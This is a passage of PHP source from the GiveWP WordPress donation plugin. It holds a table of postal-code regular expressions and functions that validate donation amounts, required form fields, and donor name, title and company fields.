'JO' => '\d{5}',
'JP' => '\d{3}-\d{4}',
'KE' => '\d{5}',
'KG' => '\d{6}',
'KH' => '\d{5}',
'KR' => '\d{5}',
'KW' => '\d{5}',
'KZ' => '\d{6}',
'LA' => '\d{5}',
'LB' => '(\d{4}([ ]?\d{4})?)?',
'LI' => '(948[5-9])|(949[0-7])',
'LK' => '\d{5}',
'LR' => '\d{4}',
'LS' => '\d{3}',
'LT' => '\d{5}',
'LU' => '\d{4}',
'LV' => '\d{4}',
'MA' => '\d{5}',
'MC' => '980\d{2}',
'MD' => '\d{4}',
'ME' => '8\d{4}',
'MG' => '\d{3}',
'MH' => '969[67]\d([ \-]\d{4})?',
'MK' => '\d{4}',
'MN' => '\d{6}',
'MP' => '9695[012]([ \-]\d{4})?',
'MQ' => '9[78]2\d{2}',
'MT' => '[A-Z]{3}[ ]?\d{2,4}',
'MU' => '(\d{3}[A-Z]{2}\d{3})?',
'MV' => '\d{5}',
'MX' => '\d{5}',
'MY' => '\d{5}',
'NC' => '988\d{2}',
'NE' => '\d{4}',
'NF' => '2899',
'NG' => '(\d{6})?',
'NI' => '((\d{4}-)?\d{3}-\d{3}(-\d{1})?)?',
'NL' => '^[1-9][0-9]{3}\s?([a-zA-Z]{2})?$',
'NO' => '\d{4}',
'NP' => '\d{5}',
'NZ' => '\d{4}',
'OM' => '(PC )?\d{3}',
'PF' => '987\d{2}',
'PG' => '\d{3}',
'PH' => '\d{4}',
'PK' => '\d{5}',
'PL' => '\d{2}-\d{3}',
'PM' => '9[78]5\d{2}',
'PN' => 'PCRN 1ZZ',
'PR' => '00[679]\d{2}([ \-]\d{4})?',
'PT' => '\d{4}([\-]\d{3})?',
'PW' => '96940',
'PY' => '\d{4}',
'RE' => '9[78]4\d{2}',
'RO' => '\d{6}',
'RS' => '\d{5}',
'RU' => '\d{6}',
'SA' => '\d{5}',
'SE' => '^(s-|S-){0,1}[0-9]{3}\s?[0-9]{2}$',
'SG' => '\d{6}',
'SH' => '(ASCN|STHL) 1ZZ',
'SI' => '\d{4}',
'SJ' => '\d{4}',
'SK' => '\d{3}[ ]?\d{2}',
'SM' => '4789\d',
'SN' => '\d{5}',
'SO' => '\d{5}',
'SZ' => '[HLMS]\d{3}',
'TC' => 'TKCA 1ZZ',
'TH' => '\d{5}',
'TJ' => '\d{6}',
'TM' => '\d{6}',
'TN' => '\d{4}',
'TR' => '\d{5}',
'TW' => '\d{3}(\d{2})?',
'UA' => '\d{5}',
'UK' => '^(GIR|[A-Z]\d[A-Z\d]??|[A-Z]{2}\d[A-Z\d]??)[ ]??(\d[A-Z]{2})$',
'US' => '^\d{5}([\-]?\d{4})?$',
'UY' => '\d{5}',
'UZ' => '\d{6}',
'VA' => '00120',
'VE' => '\d{4}',
'VI' => '008(([0-4]\d)|(5[01]))([ \-]\d{4})?',
'WF' => '986\d{2}',
'YT' => '976\d{2}',
'YU' => '\d{5}',
'ZA' => '\d{4}',
'ZM' => '\d{5}',
];
if ( ! isset( $zip_regex[ $country_code ] ) || preg_match( '/' . $zip_regex[ $country_code ] . '/i', $zip ) ) {
$ret = true;
}
return apply_filters( 'give_is_zip_valid', $ret, $zip, $country_code );
}
/**
* Validate donation amount and auto set correct donation level id on basis of amount.
*
* Note: If amount does not match to donation level amount then level id will be auto select to first match level id on basis of amount.
*
* @param array $valid_data List of Valid Data.
*
* @return bool
*/
function give_validate_donation_amount( $valid_data ) {
$post_data = give_clean( $_POST ); // WPCS: input var ok, sanitization ok, CSRF ok.
/* @var Give_Donate_Form $form */
$form = new Give_Donate_Form( $post_data['give-form-id'] );
// Get the form currency.
$form_currency = give_get_currency( $post_data['give-form-id'] );
$donation_level_matched = false;
if ( $form->is_set_type_donation_form() ) {
// Sanitize donation amount.
$post_data['give-amount'] = give_maybe_sanitize_amount( $post_data['give-amount'], [ 'currency' => $form_currency ] );
// Backward compatibility.
if ( $form->is_custom_price( $post_data['give-amount'] ) ) {
$post_data['give-price-id'] = 'custom';
}
$donation_level_matched = true;
} elseif ( $form->is_multi_type_donation_form() ) {
$variable_prices = $form->get_prices();
// Bailout.
if ( ! $variable_prices ) {
return false;
}
// Sanitize donation amount.
$post_data['give-amount'] = give_maybe_sanitize_amount( $post_data['give-amount'], [ 'currency' => $form_currency ] );
$variable_price_option_amount = give_maybe_sanitize_amount( give_get_price_option_amount( $post_data['give-form-id'], $post_data['give-price-id'] ), [ 'currency' => $form_currency ] );
$new_price_id = '';
if ( $post_data['give-amount'] === $variable_price_option_amount ) {
return true;
}
if ( $form->is_custom_price( $post_data['give-amount'] ) ) {
$new_price_id = 'custom';
} else {
// Find correct donation level from all donation levels.
foreach ( $variable_prices as $variable_price ) {
// Sanitize level amount.
$variable_price['_give_amount'] = give_maybe_sanitize_amount( $variable_price['_give_amount'] );
// Set first match donation level ID.
if ( $post_data['give-amount'] === $variable_price['_give_amount'] ) {
$new_price_id = $variable_price['_give_id']['level_id'];
break;
}
}
}
// If donation amount is not find in donation levels then check if form has custom donation feature enable or not.
// If yes then set price id to custom if amount is greater then custom minimum amount (if any).
if ( $post_data['give-price-id'] === $new_price_id ) {
$donation_level_matched = true;
}
} // End if().
if ( ! $donation_level_matched ) {
give_set_error(
'invalid_donation_amount',
sprintf(
/* translators: %s: invalid donation amount */
__( 'Donation amount %s is invalid.', 'give' ),
give_currency_filter(
give_format_amount( $post_data['give-amount'], [ 'sanitize' => false ] )
)
)
);
}
}
add_action( 'give_checkout_error_checks', 'give_validate_donation_amount', 10, 1 );
/**
* Validate Required Form Fields.
*
* @param int $form_id Form ID.
*
* @since 2.0
*/
function give_validate_required_form_fields( $form_id ) {
// Sanitize values submitted with donation form.
$post_data = give_clean( $_POST ); // WPCS: input var ok, sanitization ok, CSRF ok.
$requiredFormFields = give_get_required_fields( $form_id );
// Loop through required fields and show error messages.
foreach ( $requiredFormFields as $field_name => $value ) {
if ( empty( $post_data[ $field_name ] ) ) {
give_set_error( $value['error_id'], $value['error_message'] );
}
}
}
/**
* Validates and checks if name fields are valid or not.
*
* @param array $post_data List of post data.
*
* @since 3.16.5 Check if "give_title" is set to prevent PHP warnings
* @since 3.16.4 Add additional validation for company name field
* @since 3.16.3 Add additional validations for name title prefix field
* @since 2.1
*
* @return void
*/
function give_donation_form_validate_name_fields( $post_data ) {
$formId = absint( $post_data['give-form-id'] );
if (!give_is_name_title_prefix_enabled($formId) && isset($post_data['give_title'])) {
give_set_error( 'disabled_name_title', esc_html__( 'The name title prefix field is not enabled.', 'give' ) );
}
if (!give_is_company_field_enabled($formId) && isset($post_data['give_company_name'])) {
give_set_error( 'disabled_company', esc_html__( 'The company field is not enabled.', 'give' ) );
}
if (give_is_name_title_prefix_enabled($formId) && isset($post_data['give_title']) && !in_array($post_data['give_title'], array_values(give_get_name_title_prefixes($formId)))) {
give_set_error( 'invalid_name_title', esc_html__( 'The name title prefix field is not valid.', 'give' ) );
}
$is_alpha_first_name = ( ! is_email( $post_data['give_first'] ) && ! preg_match( '~[0-9]~', $post_data['give_first'] ) );
$is_alpha_last_name = ( ! is_email( $post_data['give_last'] ) && ! preg_match( '~[0-9]~', $post_data['give_last'] ) );
$is_alpha_title = ( isset($post_data['give_title']) && ! is_email( $post_data['give_title'] ) && ! preg_match( '~[0-9]~', $post_data['give_title'] ) );
if (!$is_alpha_first_name || ( ! empty( $post_data['give_last'] ) && ! $is_alpha_last_name) || ( ! empty( $post_data['give_title'] ) && ! $is_alpha_title) ) {
give_set_error( 'invalid_name', esc_html__( 'The First Name and Last Name fields cannot contain an email address or numbers.', 'give' ) );
}
}